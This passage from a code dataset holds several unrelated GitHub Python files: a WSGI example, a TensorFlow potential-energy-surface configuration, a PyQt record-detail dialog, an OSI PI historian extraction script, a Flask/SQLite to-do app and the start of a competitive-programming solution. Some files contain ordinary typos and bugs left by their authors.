%5s %r\\n\" % (key, typ, val))\n content = \"\".join(buf)\n return content\n\n\n## これはオブジェクトであるが、関数と同じように呼び出せる\n## (= wsgi_app(environ, start_response) として呼び出せる)。\n## そのため、今までの関数と同じように扱える。\nwsgi_app = WSGIApplication()\n\n\nif __name__ == \"__main__\":\n from wsgiref.simple_server import make_server\n wsgi_server = make_server('localhost', 7000, wsgi_app)\n wsgi_server.serve_forever()\n","repo_name":"kwatch/step-by-step","sub_path":"framework_python/fw03.py","file_name":"fw03.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"ja","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"11717732622","text":"import tensorflow as tf\nimport numpy\nfrom DiatPot_O2_UMN import V_O2_UMN\nfrom DiatPot_N2_DS import V_N2_DS, V_N2_LeRoy\n\nclass NNInput(object):\n\n TrainFlg = True\n GetIniWeightsFlg = 0\n TryNNFlg = 0\n WriteFinalFlg = 1 # Int Flag for Writing Parameters; =0: only at the end; =1: only .npz format at each improved iter; =2 .npz and .csv at each improved iter\n\n Machine = 'LINUX'\n if (Machine == 'MAC'):\n PathToSPES = '/Users/sventuri/WORKSPACE/Spebus/PESConstruction/' \n PathToSPESOutput = '/Users/sventuri/WORKSPACE/Spebus_OUTPUT/' \n elif (Machine == 'LINUX'):\n PathToSPES = '/home/venturi/WORKSPACE/Spebus/PESConstruction/'\n PathToSPESOutput = '/home/venturi/WORKSPACE/Spebus_OUTPUT/'\n\n\n # System = 'N3'\n # iPES = '1'\n # DiatPot_Fun = V_N2_DS\n # DiatPot_FunPrint = V_N2_LeRoy\n # PreLogShift = 1.0\n # PathToDataFldr = PathToSPES + '/Data_PES/' + System + '/Triat_David/PES_' + iPES + '/'\n System = 'O3'\n iPES = '9'\n DiatPot_Fun = V_O2_UMN\n DiatPot_FunPrint = V_O2_UMN\n PreLogShift = -3.5\n PathToDataFldr = PathToSPES + '/AbInitio_Data/' + System + '/UMN_AbInitio/Triat/PES_' + str(iPES) + '/'\n\n Model = 'ModPIP'\n BondOrderStr = 'MorseFun'\n if (Model=='ModPIP'):\n LayersName = ['InputLayer', 'BondOrderLayer', 'PIPLayer', 'HiddenLayer1', 'HiddenLayer2', 'OutputLayer']\n ActFun = [ None, None, tf.nn.tanh, tf.nn.tanh, None]\n NHid = [ 3, 6, 20, 10 ]\n NLayers = []\n Lambda = numpy.array([[1.0, 1.0, 1.0],[1.0, 1.0, 1.0]])\n re = numpy.array([[1.0, 1.0, 0.0],[1.0, 1.0, 1.0]])\n BiasesFlg = True\n PathToOutputFldr = PathToSPESOutput + '/Output_' + Machine + '/' + System + '_' + 'PES' + str(iPES) + '/TensorFlow/'\n PathToWeightFldr = PathToSPESOutput + '/Output_' + Machine + '/' + System + '_' + 'PES' + str(iPES) + '/TensorFlow/'\n CheckpointFilePath = PathToSPESOutput + '/Output_' + Machine + '/' + System + '_' + 'PES' + str(iPES) + '/Training/cp.ckpt' \n CheckpointFldr = PathToSPESOutput + '/Output_' + Machine + '/' + System + '_' + 'PES' + str(iPES) + '/Training/' \n elif (Model=='ModPIPPol'):\n LayersName = ['InputLayer', 'BondOrderLayer', 'PolLayer']\n NLayers = [3,1,1]\n Lambda = numpy.array([[1.0, 1.0, 1.0],[1.0, 1.0, 1.0]])\n re = numpy.array([[0.0, 0.0, 0.0],[0.0, 0.0, 0.0]])\n NOrd = 10\n BiasesFlg = False\n PathToOutputFldr = PathToSPES + '/../Output_' + Machine + '/ModPIPPol_Determ_' + str(NOrd) + '_Triat/' + System + '_' + iPES + '/'\n PathToWeightFldr = PathToSPES + '/../Output_' + Machine + '/ModPIPPol_Determ_' + str(NOrd) + '_Triat/' + System + '_' + iPES + '/'\n elif (Model=='PIP'):\n LayersName = ['InputLayer', 'HiddenLayer1', 'HiddenLayer2', 'OutputLayer']\n ActFun = [ lasagne.nonlinearities.tanh, lasagne.nonlinearities.tanh, lasagne.nonlinearities.linear]\n NHid = [ 30, 20 ]\n NLayers = []\n Lambda = numpy.array([[1.0, 1.0, 1.0],[1.0, 1.0, 1.0]])\n re = numpy.array([[0.0, 0.0, 0.0],[0.0, 0.0, 0.0]])\n BiasesFlg = True\n PathToOutputFldr = PathToSPESOutput + '/Output_' + Machine + '/PIP_Determ_' + str(NHid[0]) + '_' + str(NHid[1]) + '_Triat/' + System + '_' + iPES + '/'\n PathToWeightFldr = PathToSPESOutput + '/Output_' + Machine + '/PIP_Determ_' + str(NHid[0]) + '_' + str(NHid[1]) + '_Triat/' + System + '_' + iPES + '/'\n \n GenDataFlg = False\n NIn = 3\n NOut = 1\n #PercTrain = 1.0\n PercValid = 0.2\n RandomizeDataFlg = True\n NormalizeDataFlg = False\n\n NEpoch = 3000\n NMiniBatch = 30\n NPatience = 1000 \n NDeltaPatience = 2 \n ImpThold = 1.e-7\n\n Method = 'adam' # nesterov, rmsprop, adamax, amsgrad, adadelta\n LearningRate = 1.e-4\n kMomentum = 0.9\n EarlyStoppingFlg = False\n RMSProp = [0.85, 0.1]\n kWeightDecay = [0.0, 1.e-5]\n\n LossFunction = 'mse' # mean_squared_logarithmic_error, mse\n OutputExpon = 0.0\n Power = 5.0\n Shift = 7.27216\n\n OnlyTriatFlg = False\n MultErrorFlg = True\n AddDiatPointsFlg = 0\n\n #AngVector = [60,80,100,120,140,160,180]\n AngVector = [60]\n #AnglesCuts = numpy.array([110.0, 170.0, 60.0, 116.75])\n #RCuts = numpy.array([2.26767, 2.26767, 2.64562, 2.28203327])\n AnglesCuts = numpy.array([120.0])\n RCuts = numpy.array([2.073808])\n\n AbscissaConverter = 1.0\n\n if (System == 'O3') or (System == 'N3'):\n PIPTypeStr = 'PIP_A3'\n elif (System == 'CO2'):\n PIPTypeStr = 'PIP_A2B'\n\n def __init__(self,\n System,\n DiatPot_Fun, \n Model,\n Lambda,\n re,\n GenDataFlg,\n PathToDataFldr,\n AngVector,\n NIn, \n NOut, \n PercValid, \n PercTest,\n RandomizeDataFlg, \n NormalizeDataFlg,\n WriteFinalFlg, \n LayersName,\n NEpoch, \n NMiniBatch, \n NIterMax, \n NHid, \n NLayers, \n ActFun, \n LearningRate,\n kMomentum, \n EarlyStoppingFlg, \n NPatience, \n NDeltaPatience, \n ImpThold, \n RMSProp, \n kWeightDecay, \n PathToOutputFldr, \n TryNNFlg,\n CheckpointFilePath,\n Method,\n LossFunction,\n GetIniWeightsFlg,\n PathToWeightFldr,\n OnlyTriatFlg,\n MultErrorFlg,\n PreLogShift,\n iPES,\n AnglesCuts,\n RCuts,\n AddDiatPointsFlg,\n OutputExpon,\n BondOrderStr,\n PIPTypeStr,\n Power,\n Shift,\n BiasesFlg, \n DiatPot_FunPrint,\n NOrd,\n AbscissaConverter,\n CheckpointFldr):\n \n self.Model = Model\n self.System = Sytem\n self.DiatPot_Fun = DiatPot_Fun\n self.Lambda = Lambda\n self.re = re\n self.GenDataFlg = GenDataFlg\n self.PathToDataFldr = PathToDataFldr\n self.AngVector = AngVector\n self.NIn = NIn\n self.NOut = NOut\n self.PercValid = PercValid\n self.PercTest = PercTest\n self.RandomizeDataFlg = RandomizeDataFl\n self.NormalizeDataFlg = NormalizeDataFlg\n self.WriteFinalFlg = WriteFinalFlg\n self.LayersName = LayersName\n self.NEpoch = NEpoch\n self.NMiniBatch = NMiniBatch\n self.NIterMax = NIterMax\n self.NHid = NHid\n self.NLayers = NLayers\n self.ActFun = ActFun\n self.LearningRate = LearningRate\n self.kMomentum = kMomentum\n self.EarlyStoppingFlg = EarlyStoppingFlg\n self.NPatience = NPatience\n self.NDeltaPatience = NDeltaPatience\n self.ImpThold = ImpThold\n self.LossFunction = LossFunction\n self.Method = Method\n self.RMSProp = RMSProp\n self.kWeightDecay = kWeightDecay\n self.CheckpointFilePath = CheckpointFilePath\n self.PathToOutputFldr = PathToOutputFldr\n self.TryNNFlg = TryNNFlg\n self.GetIniWeightsFlg = GetIniWeightsFlg\n self.PathToWeightFldr = PathToWeightFldr\n self.OnlyTriatFlg = OnlyTriatFlg\n self.MultErrorFlg = MultErrorFlg\n self.PreLogShift = PreLogShift\n self.AnglesCuts = AnglesCuts\n self.RCuts = RCuts\n self.iPES = iPES\n self.AddDiatPointsFlg = AddDiatPointsFlg\n self.OutputExpon = OutputExpon\n self.BondOrderStr = BondOrderStr\n self.PIPTypeStr = PIPTypeStr\n self.Shift = Shift\n self.Power = Power\n self.BiasesFlg = BiasesFlg\n self.DiatPot_FunPrint = DiatPot_FunPrint\n self.NOrd = NOrd\n self.AbscissaConverter = AbscissaConverter\n self.CheckpointFldr - CheckpointFldr\n","repo_name":"simoneventuri/Spebus","sub_path":"PESConstruction/NN/TensorFlow_Keras/NNInput.py","file_name":"NNInput.py","file_ext":"py","file_size_in_byte":10469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38519948435","text":"from PyQt5.Qt import Qt\nfrom PyQt5.QtWidgets import (QDialog, QFileDialog, QHeaderView, QMessageBox,\n QTableWidget, QTableWidgetItem)\n\nfrom libs.enumrations import UserPermission\nfrom libs.fields_translater import FieldsTranslater\nfrom libs.g import g\nfrom model.base import Base\nfrom model.zyrs import ZYRS\nfrom ui.page_elements.table_cells.check_combo_widget import CheckComboWidget\nfrom ui.page_elements.table_cells.date_widget import DateWidget\nfrom ui.page_elements.table_cells.file_widget import FileWidget\nfrom ui.page_elements.table_cells.normal_widget import NormalWidget\nfrom ui.page_elements.table_cells.pic_widget import PicWidget\nfrom ui.page_elements.table_cells.sex_widget import SexWidget\nfrom ui.wrapper.dialog_like_widget import create_dialog_like_widget\n\nfrom .dialogUI import Ui_Dialog\n\n\nclass DetailPage(QDialog):\n pic_item_height = 4\n\n def __init__(self, parent, model: Base):\n super().__init__(parent)\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.setWindowFlags(Qt.Window)\n self.setMinimumSize(800, 400)\n self.default_conditions = {}\n # model\n self.model = model\n self.need_pic = self.model.pic\n self.data_id = 0\n self.translator = FieldsTranslater(self.model)\n # tableWidget\n self.ui.tableWidget.setSelectionMode(QTableWidget.NoSelection)\n self.ui.tableWidget.cellChanged.connect(self.ui.tableWidget.resizeRowsToContents)\n # tableWidget-header\n hor_header = self.ui.tableWidget.horizontalHeader()\n hor_header.setSectionResizeMode(QHeaderView.Stretch)\n hor_header.setSectionResizeMode(0, QHeaderView.Fixed)\n hor_header.setSectionResizeMode(2, QHeaderView.Fixed)\n # btn-bind\n self.ui.btn_close.clicked.connect(self.close)\n self.ui.btn_append.clicked.connect(self.append)\n self.ui.btn_modify.clicked.connect(self.modify)\n self.ui.btn_delete.clicked.connect(self.delete)\n self.ui.btn_export.clicked.connect(self.export)\n\n def set_default_conditions(self, **kwargs):\n self.default_conditions = kwargs\n\n def append(self):\n data = self.get_data_from_table()\n if 'nickname' in data:\n zyrs = ZYRS.search(nickname=data['nickname'])['data']\n if zyrs:\n box = QMessageBox(QMessageBox.Question, \"添加人物信息\", \"已存在该人\")\n box.setStandardButtons(QMessageBox.Yes | QMessageBox.No)\n box.setDefaultButton(QMessageBox.Yes)\n box.button(QMessageBox.Yes).setText(\"显示详情\")\n box.button(QMessageBox.No).setText(\"直接添加\")\n res = box.exec_()\n if res == QMessageBox.Yes:\n if zyrs:\n if len(zyrs) == 1:\n dialog = DetailPage(self.parent(), ZYRS)\n dialog.show_(True, {'id': zyrs[0].id})\n else:\n from .pages import ZYRSChoicePage\n dialog = create_dialog_like_widget(self.parent(), ZYRSChoicePage())\n # dialog.setFixedSize(1500, 800)\n dialog.wrapped_widget.set_default_conditions(nickname=data['nickname'])\n dialog.exec_()\n return\n self.model.create(**data)\n self.close()\n\n def modify(self):\n data = self.get_data_from_table()\n item = self.model.get_by_id(self.data_id)\n for file in item.read_field:\n data.pop(file)\n item.modify(**data)\n self.close()\n\n def delete(self):\n res = QMessageBox.question(None, \"删除\", \"确认删除吗?\")\n if res == QMessageBox.No:\n return\n item = self.model.get_by_id(self.data_id)\n item.delete()\n self.close()\n\n def export(self):\n try:\n name = self.model.get_by_id(self.data_id).nickname\n except:\n name = self.data_id\n default_name = \"./{model}-{name}.docx\".format(model=self.model.class_name, name=name)\n filename = QFileDialog.getSaveFileName(None, \"导出文档\", default_name, \"word文档(*.docx)\")[0]\n if filename == \"\":\n return\n try:\n self.model.export_document(self.data_id, filename)\n except Exception as e:\n QMessageBox.warning(None, \"导出数据\", \"导出失败,请关闭目标文件!\")\n return\n\n QMessageBox.information(None, \"导出文档\", \"导出完成\")\n\n def refresh_data(self, id_: int):\n if id_ == -1:\n meta = self.model()\n for i, j in self.default_conditions.items():\n setattr(meta, i, j)\n else:\n meta = self.model.get_by_id(id_)\n if meta is None:\n print(\"Not found:\", self.model.class_name, \"id:\", id_)\n QMessageBox.critical(None, \"显示详情\", \"找不到该人员\")\n return False\n data_list = []\n filter_list = ['id', 'photo']\n filtered_data = {}\n for idx in meta.field:\n if idx in filter_list:\n filtered_data[idx] = getattr(meta, idx)\n continue\n comment = self.translator.to_text(idx)\n value = getattr(meta, idx)\n type_ = 'normal'\n if idx in self.model.file_field:\n type_ = 'file'\n if idx in self.model.combo_field:\n type_ = 'combo'\n if idx in self.model.date_field:\n type_ = 'date'\n if idx == 'sex':\n type_ = \"sex\"\n read_only = True if idx in self.model.read_field else False\n data_list.append({\n 'idx': idx,\n 'comment': comment,\n 'value': value,\n 'type': type_,\n 'readonly': read_only\n })\n if meta.pic:\n filtered_data['photo'] = meta.photo\n self.refresh_table(data_list, **filtered_data)\n return True\n\n def refresh_table(self, data_list, **kwargs):\n table_widget = self.ui.tableWidget\n pic_height = self.pic_item_height if self.need_pic else 0\n row_count = (len(data_list) - pic_height + 1) // 2 + pic_height\n column_count = 4\n table_widget.clearContents()\n table_widget.setRowCount(row_count)\n table_widget.setColumnCount(column_count)\n print(1)\n # pic-item\n if self.need_pic:\n table_widget.setSpan(0, 2, pic_height, 1)\n table_widget.setSpan(0, 3, pic_height, 1)\n print(2)\n item = QTableWidgetItem()\n item.setFlags(Qt.ItemIsEnabled)\n item.setText(\"照片\")\n table_widget.setItem(0, 2, item)\n pic_widget = PicWidget()\n pic_widget.set_picture(kwargs.get('photo'))\n table_widget.setCellWidget(0, 3, pic_widget)\n # data-list-set\n for i, item in enumerate(data_list[:pic_height]):\n self.generate_item(item, i, 0)\n for i, item in enumerate(data_list[pic_height:]):\n row = pic_height + i // 2\n col = 0 if i % 2 == 0 else 2\n self.generate_item(item, row, col)\n # 奇数时不可编辑\n if (len(data_list) - pic_height) % 2 == 1:\n item = QTableWidgetItem()\n item.setFlags(Qt.NoItemFlags)\n table_widget.setItem(row_count - 1, 2, item)\n item = QTableWidgetItem()\n item.setFlags(Qt.NoItemFlags)\n table_widget.setItem(row_count - 1, 3, item)\n table_widget.resizeColumnsToContents()\n table_widget.resizeRowsToContents()\n\n def generate_item(self, item, row, col):\n table_widget = self.ui.tableWidget\n comment_item = QTableWidgetItem()\n comment_item.setText(item['comment'])\n comment_item.setFlags(Qt.ItemIsEnabled)\n table_widget.setItem(row, col, comment_item)\n widget = None\n if item['type'] == 'normal':\n widget = NormalWidget(item['value'])\n widget.textChanged.connect(table_widget.resizeRowsToContents)\n elif item['type'] == 'file':\n description = \"{model}-{id}-{comment}\".format(\n model=self.model.class_name,\n id=self.data_id,\n comment=item['comment']\n )\n widget = FileWidget(description)\n widget.set_file_path(item['value'])\n elif item['type'] == 'sex':\n widget = SexWidget()\n widget.set_sex(item['value'])\n elif item['type'] == 'combo':\n widget = CheckComboWidget()\n widget.exclude = self.model.combo_field[item['idx']]['exclude']\n widget.set_items(self.model.combo_field[item['idx']]['items'])\n widget.selected_items = item['value']\n widget.setFont(widget.font())\n elif item['type'] == 'date':\n widget = DateWidget()\n widget.set_date(item['value'])\n if widget:\n if item['readonly']:\n widget.setEnabled(False)\n table_widget.setCellWidget(row, col + 1, widget)\n\n def get_data_from_table(self) -> dict:\n table_widget = self.ui.tableWidget\n pic_height = self.pic_item_height if self.need_pic else 0\n row_cnt = table_widget.rowCount()\n data = dict()\n if self.need_pic:\n pic_widget = table_widget.cellWidget(0, 3)\n data['photo'] = pic_widget.get_data()\n for row in range(0, row_cnt):\n cols = [0] if row < pic_height else [0, 2]\n for col in cols:\n item = table_widget.item(row, col)\n if item is None or item.text() == '':\n continue\n text = item.text()\n field = self.translator.to_field(text)\n widget = table_widget.cellWidget(row, col + 1)\n content = widget.get_data()\n data[field] = content\n for field, val in self.default_conditions.items():\n if field in data:\n continue\n data[field] = val\n return data\n\n def show_(self, enable: bool, data):\n self.ui.tableWidget.setEnabled(enable)\n id_ = data['id']\n self.data_id = id_\n if self.model.export_docx:\n self.ui.btn_export.show()\n else:\n self.ui.btn_export.hide()\n if self.refresh_data(id_):\n self.exec_()\n else:\n self.close()\n\n def paintEvent(self, e):\n if self.data_id == -1:\n self.ui.btn_append.show()\n self.ui.btn_modify.hide()\n self.ui.btn_delete.hide()\n self.ui.btn_export.hide()\n else:\n self.ui.btn_append.hide()\n self.ui.btn_export.show()\n self.ui.btn_modify.show()\n self.ui.btn_delete.show()\n if g.current_user.permission != UserPermission.Admin:\n self.ui.btn_append.hide()\n self.ui.btn_modify.hide()\n self.ui.btn_delete.hide()\n","repo_name":"ArcherLuo233/election-s-prediction","sub_path":"ui/page_elements/detail_page/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38382919767","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nThis function uses PIConnect (https://pypi.org/project/PIconnect/) to extract \r\n'calculated' or 'sampled' data from a tag or a CSV file of tags within a OSI \r\nPI Historian database into a pandas DataFrame.\r\n\r\nTo use this function, you need to install PIConnect: pip install PIconnect\r\n\r\nINPUTS:\r\n 1. 'Start Date' E.g., 8/21/2020 7:30:00 [MM/DD/YYY HH:MM:SS]\r\n 2. 'End Date' E.g., 8/21/2021 7:30:00 [MM/DD/YYY HH:MM:SS]\r\n 3. 'Time Interval' E.g., 60s (one minute), 10m (ten minutes), 1h (one hour), \r\n 1d (one day), 1m (one month), etc.\r\n 4. 'PI Tag' or 'csv file of PI tags' (e.g., 'P1-FIC-11-024/PV.CV'). A\r\n sample csv files is provided.\r\n 5. 'Variable Name' Often times, the PI tags are meaningless so you could\r\n use 'P1-Flow' for an example. The csv file uses the second column for\r\n the variable name.\r\n 6. 'Data Type' This can be either 'summary' (default) or 'sampled'.\r\n -Summary works only with numeric data and can be used with 'Summary \r\n Type' below.\r\n -Sampled works with either numerical or non-numerical data. This \r\n just grabs the data point at the time/interval selected.\r\n 7. 'Summary Type' is the type of calculation done for 'Summary' data type.\r\n This can be selected from the following:\r\n -average (default)\r\n -maximum\r\n -minimum\r\n -total (i.e.,summation)\r\n -standard deviation (std_dev)\r\n -range\r\n -count\r\n -mean\r\n\r\nOUTPUTS:\r\n Pandas DataFrame:\r\n Index: Time interval [datetime64]\r\n Header: Variable name(s)\r\n Columns: 'summary' data float64\r\n 'sampled' data float64 or string depending on PI tag\r\n \r\nExample 1:\r\n In this example, we will extract 10-minute hourly average data for a flow \r\n meter during the calendar year of 2019.\r\n PI_Call_Tag(1/1/2019, 1/1/2020, 10m, 'P1-FIC/PV.CV', 'P1-Flow')\r\n\r\nExample 2:\r\n In this example we will calculate maximum monthly peak demand.\r\n PI_Call_Tag(1/1/2019, 1/1/2020, 10m, 'P1-FIC-11-024/PV.CV', 'P1-kW-Max', summaryType='maximum')\r\n \r\n The function outputs a dataframe with the variable renamed 'P1-kW-Max'.\r\n \r\nExample 3: \r\n Let's extract data from a power meter with the PI tag: P1-KW-11-024/PV.CV\r\n We want data range between 1/1/2019 to 1/1/2020\r\n We want the the maximum data over a 1 month time interval\r\n The function would be:\r\n PI_Call_Tag(1/1/2019, 1/1/2020, 10m, 'P1-FIC-11-024/PV.CV', 'P1-kW-Max', summaryType='maximum')\r\n \r\n The function outputs a dataframe with the variable renamed 'P1-kW-Max'.\r\n\r\nTO DO:\r\n-Add functionality to use multiple different summary types within a csv file\r\n\r\n@Author: Nicholas Zibin\r\n@Date: August 10, 2020\r\n@License: MIT\r\n\r\n\"\"\"\r\n\r\n\r\nimport PIconnect as PI\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom csv import reader\r\nfrom PIconnect.PIConsts import SummaryType\r\n\r\ndef PI_Call(start, end, interval, csvFile, dataType='summary', summaryType='average'):\r\n '''Extract 'calculated' or 'sampled' data from a tag or a CSV file of tags \r\n within a OSI PI Historian database into a pandas DataFrame.\r\n \r\n Args:\r\n start (str): Start date. E.g., 8/21/2020 7:30:00 [MM/DD/YYY HH:MM:SS]\r\n end (str): End date. E.g., 8/21/2021 7:30:00 [MM/DD/YYY HH:MM:SS]\r\n interval: (str): Time interval. E.g., 60s (one minute), 10m (ten \r\n minutes), 1h (one hour),1d (one day), 1m (one month), etc.\r\n csvFile (str): CSV file containing column of PI tags and one column\r\n and your variable name of choice for each tag.\r\n dataType (str): Either 'summary' (defualt), or 'sampled'\r\n summaryType (str): Summary type calculation:\r\n -average (default)\r\n -maximum\r\n -minimum\r\n -total (i.e.,summation)\r\n -standard deviation (std_dev)\r\n -range\r\n -count\r\n -mean\r\n \r\n Returns:\r\n Pandas DataFrame:\r\n Index: Time interval [datetime64]\r\n Header: Variable name(s)\r\n Columns: 'summary' data float64\r\n 'sampled' data float64 or string depending on PI tag \r\n \r\n '''\r\n \r\n #Import the data in csv file with the format of: PI tag, variable name\r\n # For example, the variable name could be 'Flow'\r\n with open(csvFile, 'r') as read_obj:\r\n csv_reader = reader(read_obj)\r\n query, var_names = zip(*csv_reader)\r\n query = list(query)\r\n var_names = list(var_names)\r\n\r\n #Load the data from PI\r\n with PI.PIServer() as server:\r\n points = server.search(query)\r\n data = []\r\n for point in points:\r\n if dataType == 'sampled':\r\n tmp = point.interpolated_values(start, end, interval)\r\n elif dataType == 'summary':\r\n if summaryType == 'average':\r\n tmp = point.summaries(start, end, interval, SummaryType.AVERAGE) \r\n elif summaryType == 'maximum':\r\n tmp = point.summaries(start, end, interval, SummaryType.MAXIMUM)\r\n elif summaryType == 'minimum':\r\n tmp = point.summaries(start, end, interval, SummaryType.MINIMUM)\r\n elif summaryType == 'total':\r\n tmp = point.summaries(start, end, interval, SummaryType.TOTAL)\r\n elif summaryType == 'range':\r\n tmp = point.summaries(start, end, interval, SummaryType.RANGE) \r\n elif summaryType == 'count':\r\n tmp = point.summaries(start, end, interval, SummaryType.COUNT)\r\n elif summaryType == 'std_dev':\r\n tmp = point.summaries(start, end, interval, SummaryType.STD_DEV) \r\n else: \r\n print('ERROR: Summary type not valid.')\r\n return\r\n tmp = tmp.rename(columns={'AVERAGE': point.tag}) \r\n data.append(tmp)\r\n else:\r\n print('ERROR: Data type not valid.')\r\n return\r\n data = pd.concat(data, axis=1) \r\n data = data.tz_convert('Canada/Pacific').tz_localize(None) #Have to convert to timezone\r\n if dataType == 'sampled':\r\n data = pd.DataFrame(data)\r\n data = data.tz_convert('Canada/Pacific').tz_localize(None)\r\n data = data.replace({'RUNNING': 1, 'STOPPED': 0, 'FAIL': 0})\r\n data = data.rename(columns = {query: var_name})\r\n data = data.drop(data.tail(1).index)\r\n data = data.apply(pd.to_numeric, errors='coerce') #converts any errors to NaN\r\n data = data.replace('[-11059] No Good Data For Calculation', np.nan)\r\n data.columns = var_names\r\n\r\n return data\r\n\r\ndef PI_Call_Tag(start, end, interval, query, var_name, dataType='summary', summaryType='average'):\r\n \r\n with PI.PIServer() as server:\r\n point = server.search(query)[0]\r\n data = []\r\n if dataType == 'sampled':\r\n data = point.interpolated_values(start, end, interval)\r\n elif dataType == 'summary': \r\n if summaryType == 'average':\r\n data = point.summaries(start, end, interval, SummaryType.AVERAGE) \r\n elif summaryType == 'maximum':\r\n data = point.summaries(start, end, interval, SummaryType.MAXIMUM)\r\n elif summaryType == 'minimum':\r\n data = point.summaries(start, end, interval, SummaryType.MINIMUM)\r\n elif summaryType == 'total':\r\n data = point.summaries(start, end, interval, SummaryType.TOTAL)\r\n elif summaryType == 'range':\r\n data = point.summaries(start, end, interval, SummaryType.RANGE) \r\n elif summaryType == 'count':\r\n data = point.summaries(start, end, interval, SummaryType.COUNT)\r\n elif summaryType == 'std_dev':\r\n data = point.summaries(start, end, interval, SummaryType.STD_DEV) \r\n else: \r\n print('ERROR: Summary type not valid.')\r\n return\r\n data = data.rename(columns={'AVERAGE': var_name}) \r\n data = data.tz_convert('Canada/Pacific').tz_localize(None) #Have to convert to timezone\r\n else:\r\n print('ERROR: Data type not valid.')\r\n return\r\n if dataType == 'sampled':\r\n data = pd.DataFrame(data)\r\n data = data.tz_convert('Canada/Pacific').tz_localize(None)\r\n data = data.replace({'RUNNING': 1, 'STOPPED': 0, 'FAIL': 0})\r\n data = data.rename(columns = {query: var_name})\r\n data = data.drop(data.tail(1).index)\r\n data = data.apply(pd.to_numeric, errors='coerce') #converts any errors to NaN\r\n data = data.replace('[-11059] No Good Data For Calculation', np.nan)\r\n #data.columns[0] = var_name\r\n\r\n return data\r\n\r\n\r\ndf = PI_Call_Tag('2022-08-01 00:00:00', '2022-09-01 00:00:00', '5m', 'SSPP-P-200/RUN.CV', 'P200_ON', dataType='sampled')\r\n\r\n#Test below\r\n#t20 = PI_Call('8/21/2020 7:30:00', '8/21/2020 11:47:00', '60s', 'Cape_Horn_tags.csv')\r\n#t20_sampled = PI_Call('8/21/2020 7:30:00', '8/21/2020 11:47:00', '60s', 'Cape_Horn_sampled_tags.csv', dataType='sampled')\r\n#t20 = pd.concat([t20, t20_sampled], axis=1)\r\n#print(t20.V226[140]) \r\n \r\n#t20 = PI_Call_Tag('8/21/2020 7:30:00', '8/21/2020 11:47:00', '60s', 'WWHL-LI-051/VOLUME/PV.CV', 'CH_Vol', dataType='summary', summaryType='average')","repo_name":"nicholaszibin/PI-Data-Extract","sub_path":"PI_Data.py","file_name":"PI_Data.py","file_ext":"py","file_size_in_byte":10010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31078865055","text":"from flask import Flask, render_template, request, redirect, url_for\r\nimport sqlite3\r\n\r\napp = Flask(__name__)\r\n\r\n# Set up the database\r\nconn = sqlite3.connect(\"tasks.db\")\r\nc = conn.cursor()\r\nc.execute(\"CREATE TABLE IF NOT EXISTS tasks (id INTEGER PRIMARY KEY AUTOINCREMENT, task TEXT, completed INTEGER)\")\r\nconn.commit()\r\n\r\n# Define a function to get the tasks from the database\r\ndef get_tasks():\r\n c.execute(\"SELECT * FROM tasks\")\r\n tasks = []\r\n for row in c.fetchall():\r\n tasks.append({\"id\": row[0], \"task\": row[1], \"completed\": bool(row[2])})\r\n return tasks\r\n\r\n# Define a function to add a task to the database\r\ndef add_task(task):\r\n c.execute(\"INSERT INTO tasks (task, completed) VALUES (?, ?)\", (task, 0))\r\n conn.commit()\r\n\r\n# Define a function to update a task in the database\r\ndef update_task(task_id, task):\r\n c.execute(\"UPDATE tasks SET task = ? WHERE id = ?\", (task, task_id))\r\n conn.commit()\r\n\r\n# Define a function to delete a task from the database\r\ndef delete_task(task_id):\r\n c.execute(\"DELETE FROM tasks WHERE id = ?\", (task_id,))\r\n conn.commit()\r\n\r\n# Define a function to mark a task as completed in the database\r\ndef complete_task(task_id):\r\n c.execute(\"UPDATE tasks SET completed = ? WHERE id = ?\", (1, task_id))\r\n conn.commit()\r\n\r\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\r\ndef index():\r\n if request.method == \"POST\":\r\n if \"add\" in request.form:\r\n task = request.form[\"task\"]\r\n add_task(task)\r\n elif \"edit\" in request.form:\r\n task_id = request.form[\"id\"]\r\n task = request.form[\"task\"]\r\n update_task(task_id, task)\r\n elif \"delete\" in request.form:\r\n task_id = request.form[\"id\"]\r\n delete_task(task_id)\r\n elif \"complete\" in request.form:\r\n task_id = request.form[\"id\"]\r\n complete_task(task_id)\r\n return redirect(url_for(\"index\"))\r\n else:\r\n tasks = get_tasks()\r\n return render_template(\"index.html\", tasks=tasks)\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n","repo_name":"MindOSteph/ToDoListManager","sub_path":"To Do List Manager/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34017558180","text":"from itertools import product, combinations\nimport math\nimport random\nimport sys\nimport collections\nfrom pathlib import Path\nimport bisect\nimport math\n\nimport numpy as np\n\nrandom.seed(42)\n\nif Path(__file__).stem == \"Main\":\n DEBUG_OUT = False\nelse:\n DEBUG_OUT = False\n DEBUG_OUT = True\n\n\ndef q_061_top():\n if DEBUG_OUT:\n q_061(\n 6,\n [[1, 2],\n [1, 1],\n [2, 3],\n [3, 1],\n [3, 2],\n [3, 3],]\n )\n q_061(\n 6,\n [[2, 1],\n [3, 1],\n [2, 2],\n [3, 1],\n [2, 3],\n [3, 1],]\n )\n q_061(\n 6,\n [[1, 1000000000],\n [2, 200000000],\n [1, 30000000],\n [2, 4000000],\n [1, 500000],\n [3, 3], ]\n )\n else:\n q_061()\n\n\ndef q_061(q=None, tx_list=None):\n if not DEBUG_OUT:\n q = list(map(int, input().split()))[0]\n t_list = []\n x_list = []\n for _ in range(q):\n t, x = list(map(int, input().split()))\n t_list.append(t)\n x_list.append(x)\n else:\n print()\n t_list = []\n x_list = []\n for t, x in tx_list:\n t_list.append(t)\n x_list.append(x)\n\n yama = np.empty((q*2,), dtype=int) # indexが若い方が上(index=0が一番上)\n si = q - 1\n 